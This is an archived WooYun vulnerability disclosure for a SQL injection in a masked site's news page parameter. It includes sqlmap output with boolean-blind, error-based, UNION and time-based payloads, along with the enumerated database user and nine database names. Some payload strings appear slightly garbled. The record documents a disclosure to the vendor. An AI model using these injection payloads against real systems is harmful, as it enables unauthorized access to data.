乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
注入点:
http://**.**.**.**/cn/index.jsp?m=newslist&cal=2
cal参数存在注入
Place: GETParameter: cal Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=newslist&cal=2' AND 6383=6383 AND 'rAgT'='rAgT Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: m=newslist&cal=2' AND 9916=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(10)+CHAR(120)+CHAR(58)+(SELECT (CASE WHEN (9916=9916) THEN CHAR(49) ELSE CHAR(48)END))+CHAR(58)+CHAR(99)+CHAR(114)+CHAR(120)+CHAR(58))) AND 'qKTa'='qKTa Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: m=newslist&cal=-1503' UNION SELECT CHAR(58)+CHAR(118)+CHAR(107)+CHR(120)+CHAR(58)+CHAR(72)+CHAR(81)+CHAR(108)+CHAR(66)+CHAR(78)+CHAR(68)+CHAR(102+CHAR(89)+CHAR(73)+CHAR(122)+CHAR(58)+CHAR(99)+CHAR(114)+CHAR(120)+CHAR(58)--ND 'rKGe'='rKGe Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: m=newslist&cal=2'; WAITFOR DELAY '0:0:5';-- AND 'xCuf'='xCuf Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: m=newslist&cal=2' WAITFOR DELAY '0:0:5'-- AND 'oZHS'='oZHS---[14:17:28] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2000[14:17:28] [INFO] fetching current usercurrent user: 'edomuser'
available databases [9]:[*] agent[*] edom[*] ePortal_HR[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
危害等级:高
漏洞Rank:16
确认时间:2016-01-14 03:32
感謝通報
暂无